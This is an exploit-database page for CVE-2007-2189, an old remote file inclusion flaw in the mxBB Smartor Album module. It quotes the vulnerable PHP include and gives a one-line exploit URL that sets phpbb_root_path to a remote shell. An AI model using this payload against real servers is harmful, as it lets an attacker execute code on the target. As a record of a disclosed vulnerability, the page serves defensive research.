Lucene search
+L

Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion

🗓️ 19 Apr 2007 00:00:00Reported by bd0rkType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Mx Module Smartor Album FAP 2.0 RC1 Remote File Inclusion Vulnerability in admin_album_otf.ph

Related
Code
ReporterTitlePublishedViews
Family
checkpoint_advisories
Check Point Advisories
Web Servers mxBB MX Smartor Remote File Inclusion (CVE-2007-2189)
16 Jul 201400:00
checkpoint_advisories
cve
CVE
CVE-2007-2189
24 Apr 200717:00
cve
cvelist
Cvelist
CVE-2007-2189
24 Apr 200717:00
cvelist
euvd
EUVD
EUVD-2007-2184
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-2189
24 Apr 200717:19
nvd
prion
Prion
Remote file inclusion
24 Apr 200717:19
prion
               ########################################################################

                mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability

               ########################################################################


Class: Remote

Vendor: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=364

Founder: bd0rk

Contact: bd0rk[at]hackermail.com

Vulnerable Code in /admin/admin_album_otf.php

---------------------------------------------------------------------------------------------
define( 'IN_PORTAL', 1 );

if ( !empty( $setmodules ) )
{
	$file = basename( __FILE__ );
	$module['Smartor_Album']['Configuration otf'] = 'modules/mx_smartor/admin/' . $file;
	return;
}

$mx_root_path = './../../../';
$module_root_path = "./../";
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require( $mx_root_path . '/admin/pagestart.' . $phpEx );

include_once($phpbb_root_path . 'includes/functions_validate.'.$phpEx);
---------------------------------------------------------------------------------------------

$phpbb_root_path is not declared before include_once

[+]Exploit: http://[target]/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=Shell?

Shouts: str0ke, TheJT, Lu7k, GolD_M ;-)

# milw0rm.com [2007-04-19]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Apr 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.05088
31